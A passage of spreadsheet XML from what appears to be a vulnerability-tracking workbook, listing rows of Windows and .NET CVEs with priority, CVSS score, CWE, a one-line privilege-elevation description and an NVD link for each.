      <c r="F3442" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3442" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3442" s="5" t="inlineStr"/>
      <c r="I3442" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3442" s="5" t="inlineStr"/>
      <c r="K3442" s="5" t="inlineStr">
        <is>
          <t>CWE-126</t>
        </is>
      </c>
      <c r="L3442" s="5" t="inlineStr">
        <is>
          <t>Buffer over-read in Windows Win32K allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M3442" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69610</t>
        </is>
      </c>
    </row>
    <row r="3443">
      <c r="A3443" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3443" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69611</t>
        </is>
      </c>
      <c r="C3443" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3443" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3443" s="5" t="inlineStr"/>
      <c r="F3443" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3443" s="5" t="inlineStr"/>
      <c r="H3443" s="5" t="inlineStr"/>
      <c r="I3443" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3443" s="5" t="inlineStr"/>
      <c r="K3443" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L3443" s="5" t="inlineStr">
        <is>
          <t>Use after free in Virtual Hard Disk (VHD) Miniport Driver allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M3443" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69611</t>
        </is>
      </c>
    </row>
    <row r="3444">
      <c r="A3444" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3444" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69613</t>
        </is>
      </c>
      <c r="C3444" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3444" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3444" s="5" t="inlineStr"/>
      <c r="F3444" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3444" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3444" s="5" t="inlineStr"/>
      <c r="I3444" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3444" s="5" t="inlineStr"/>
      <c r="K3444" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L3444" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Image Acquisition allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M3444" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69613</t>
        </is>
      </c>
    </row>
    <row r="3445">
      <c r="A3445" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3445" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69617</t>
        </is>
      </c>
      <c r="C3445" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3445" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3445" s="5" t="inlineStr"/>
      <c r="F3445" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3445" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3445" s="5" t="inlineStr"/>
      <c r="I3445" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3445" s="5" t="inlineStr"/>
      <c r="K3445" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L3445" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows Resilient File System (ReFS) allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M3445" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69617</t>
        </is>
      </c>
    </row>
    <row r="3446">
      <c r="A3446" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3446" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69621</t>
        </is>
      </c>
      <c r="C3446" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3446" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3446" s="5" t="inlineStr"/>
      <c r="F3446" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3446" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3446" s="5" t="inlineStr"/>
      <c r="I3446" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3446" s="5" t="inlineStr"/>
      <c r="K3446" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L3446" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Fax Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M3446" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69621</t>
        </is>
      </c>
    </row>
    <row r="3447">
      <c r="A3447" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3447" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69630</t>
        </is>
      </c>
      <c r="C3447" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3447" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3447" s="5" t="inlineStr"/>
      <c r="F3447" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3447" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3447" s="5" t="inlineStr"/>
      <c r="I3447" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3447" s="5" t="inlineStr"/>
      <c r="K3447" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L3447" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows Win32K allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M3447" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69630</t>
        </is>
      </c>
    </row>
    <row r="3448">
      <c r="A3448" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3448" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69645</t>
        </is>
      </c>
      <c r="C3448" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3448" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3448" s="5" t="inlineStr"/>
      <c r="F3448" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3448" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3448" s="5" t="inlineStr"/>
      <c r="I3448" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3448" s="5" t="inlineStr"/>
      <c r="K3448" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L3448" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Message Queuing allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M3448" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69645</t>
        </is>
      </c>
    </row>
    <row r="3449">
      <c r="A3449" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3449" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69648</t>
        </is>
      </c>
      <c r="C3449" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3449" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3449" s="5" t="inlineStr"/>
      <c r="F3449" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3449" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3449" s="5" t="inlineStr"/>
      <c r="I3449" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3449" s="5" t="inlineStr"/>
      <c r="K3449" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L3449" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Notification allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M3449" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69648</t>
        </is>
      </c>
    </row>
    <row r="3450">
      <c r="A3450" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3450" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69652</t>
        </is>
      </c>
      <c r="C3450" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3450" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3450" s="5" t="inlineStr"/>
      <c r="F3450" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3450" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3450" s="5" t="inlineStr"/>
      <c r="I3450" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3450" s="5" t="inlineStr"/>
      <c r="K3450" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L3450" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Win32K allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M3450" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69652</t>
        </is>
      </c>
    </row>
    <row r="3451">
      <c r="A3451" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3451" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69654</t>
        </is>
      </c>
      <c r="C3451" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3451" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3451" s="5" t="inlineStr"/>
      <c r="F3451" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3451" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3451" s="5" t="inlineStr"/>
      <c r="I3451" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3451" s="5" t="inlineStr"/>
      <c r="K3451" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L3451" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Accounts Control allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M3451" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69654</t>
        </is>
      </c>
    </row>
    <row r="3452">
      <c r="A3452" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3452" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69682</t>
        </is>
      </c>
      <c r="C3452" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3452" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3452" s="5" t="inlineStr"/>
      <c r="F3452" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3452" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3452" s="5" t="inlineStr"/>
      <c r="I3452" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3452" s="5" t="inlineStr"/>
      <c r="K3452" s="5" t="inlineStr">
        <is>
          <t>CWE-362, CWE-416</t>
        </is>
      </c>
      <c r="L3452" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Host Guardian Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M3452" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69682</t>
        </is>
      </c>
    </row>
    <row r="3453">
      <c r="A3453" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3453" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69692</t>
        </is>
      </c>
      <c r="C3453" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3453" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3453" s="5" t="inlineStr"/>
      <c r="F3453" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3453" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3453" s="5" t="inlineStr"/>
      <c r="I3453" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3453" s="5" t="inlineStr"/>
      <c r="K3453" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L3453" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Audio Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M3453" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69692</t>
        </is>
      </c>
    </row>
    <row r="3454">
      <c r="A3454" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3454" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69693</t>
        </is>
      </c>
      <c r="C3454" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3454" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3454" s="5" t="inlineStr"/>
      <c r="F3454" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3454" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3454" s="5" t="inlineStr"/>
      <c r="I3454" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3454" s="5" t="inlineStr"/>
      <c r="K3454" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L3454" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Device Association Broker service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M3454" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69693</t>
        </is>
      </c>
    </row>
    <row r="3455">
      <c r="A3455" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3455" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69694</t>
        </is>
      </c>
      <c r="C3455" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3455" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3455" s="5" t="inlineStr"/>
      <c r="F3455" s="5" t="n">
        <v>0.017</v>
      </c>
      <c r="G3455" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3455" s="5" t="inlineStr"/>
      <c r="I3455" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3455" s="5" t="inlineStr"/>
      <c r="K3455" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="L3455" s="5" t="inlineStr">
        <is>
          <t>Deserialization of untrusted data in Windows IP Address Management (IPAM) Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M3455" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69694</t>
        </is>
      </c>
    </row>
    <row r="3456">
      <c r="A3456" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3456" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69708</t>
        </is>
      </c>
      <c r="C3456" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3456" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3456" s="5" t="inlineStr"/>
      <c r="F3456" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3456" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3456" s="5" t="inlineStr"/>
      <c r="I3456" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3456" s="5" t="inlineStr"/>
      <c r="K3456" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L3456" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Web Platform Storage allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M3456" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69708</t>
        </is>
      </c>
    </row>
    <row r="3457">
      <c r="A3457" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3457" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69711</t>
        </is>
      </c>
      <c r="C3457" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3457" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3457" s="5" t="inlineStr"/>
      <c r="F3457" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3457" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3457" s="5" t="inlineStr"/>
      <c r="I3457" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3457" s="5" t="inlineStr"/>
      <c r="K3457" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L3457" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Device Association Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M3457" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69711</t>
        </is>
      </c>
    </row>
    <row r="3458">
      <c r="A3458" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3458" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69735</t>
        </is>
      </c>
      <c r="C3458" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3458" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3458" s="5" t="inlineStr"/>
      <c r="F3458" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3458" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3458" s="5" t="inlineStr"/>
      <c r="I3458" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3458" s="5" t="inlineStr"/>
      <c r="K3458" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L3458" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Broadcast DVR User Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M3458" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69735</t>
        </is>
      </c>
    </row>
    <row r="3459">
      <c r="A3459" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3459" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69779</t>
        </is>
      </c>
      <c r="C3459" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3459" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3459" s="5" t="inlineStr"/>
      <c r="F3459" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3459" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3459" s="5" t="inlineStr"/>
      <c r="I3459" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3459" s="5" t="inlineStr"/>
      <c r="K3459" s="5" t="inlineStr">
        <is>
          <t>CWE-367</t>
        </is>
      </c>
      <c r="L3459" s="5" t="inlineStr">
        <is>
          <t>Time-of-ch</t>
        </is>
      </c>
      <c r="M3459" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69779</t>
        </is>
      </c>
    </row>
    <row r="3460">
      <c r="A3460" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3460" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69791</t>
        </is>
      </c>
      <c r="C3460" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3460" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3460" s="5" t="inlineStr"/>
      <c r="F3460" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3460" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3460" s="5" t="inlineStr"/>
      <c r="I3460" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3460" s="5" t="inlineStr"/>
      <c r="K3460" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L3460" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Device Association Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M3460" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69791</t>
        </is>
      </c>
    </row>
    <row r="3461">
      <c r="A3461" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3461" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69806</t>
        </is>
      </c>
      <c r="C3461" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3461" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3461" s="5" t="inlineStr"/>
      <c r="F3461" s="5" t="n">
        <v>0.018</v>
      </c>
      <c r="G3461" s="5" t="inlineStr">
        <is>
          <t>.net</t>
        </is>
      </c>
      <c r="H3461" s="5" t="inlineStr"/>
      <c r="I3461" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3461" s="5" t="inlineStr"/>
      <c r="K3461" s="5" t="inlineStr">
        <is>
          <t>CWE-200, CWE-94</t>
        </is>
      </c>
      <c r="L3461" s="5" t="inlineStr">
        <is>
          <t>Exposure of sensitive information to an unauthorized actor in .NET allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M3461" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69806</t>
        </is>
      </c>
    </row>
    <row r="3462">
      <c r="A3462" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3462" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69814</t>
        </is>
      </c>
      <c r="C3462" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3462" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3462" s="5" t="inlineStr"/>
      <c r="F3462" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3462" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3462" s="5" t="inlineStr"/>
      <c r="I3462" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3462" s="5" t="inlineStr"/>
      <c r="K3462" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L3462" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Credential Providers allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M3462" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69814</t>
        </is>
      </c>
    </row>
    <row r="3463">
      <c r="A3463" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3463" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69816</t>
        </is>
      </c>
      <c r="C3463" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3463" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3463" s="5" t="inlineStr"/>
      <c r="F3463" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3463" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3463" s="5" t="inlineStr"/>
      <c r="I3463" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3463" s="5" t="inlineStr"/>
      <c r="K3463" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L3463" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Accounts Control allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M3463" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69816</t>
        </is>
      </c>
    </row>
    <row r="3464">
      <c r="A3464" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3464" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69817</t>
        </is>
      </c>
      <c r="C3464" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3464" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3464" s="5" t="inlineStr"/>
      <c r="F3464" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3464" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3464" s="5" t="inlineStr"/>
      <c r="I3464" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3464" s="5" t="inlineStr"/>
      <c r="K3464" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L3464" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Bluetooth Port Driver allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M3464" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69817</t>
        </is>
      </c>
    </row>
    <row r="3465">
      <c r="A3465" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3465" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69818</t>
        </is>
      </c>
      <c r="C3465" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3465" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3465" s="5" t="inlineStr"/>
      <c r="F3465" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3465" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3465" s="5" t="inlineStr"/>
      <c r="I3465" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3465" s="5" t="inlineStr"/>
      <c r="K3465" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L3465" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Win32K allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M3465" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69818</t>
        </is>
      </c>
    </row>
    <row r="3466">
      <c r="A3466" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3466" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69834</t>
        </is>
      </c>
      <c r="C3466" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3466" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3466" s="5" t="inlineStr"/>
      <c r="F3466" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3466" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3466" s="5" t="inlineStr"/>
      <c r="I3466" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3466" s="5" t="inlineStr"/>
      <c r="K3466" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L3466" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows ALPC allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M3466" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69834</t>
        </is>
      </c>
    </row>
    <row r="3467">
      <c r="A3467" s="5" t="inlineStr">
        <is>
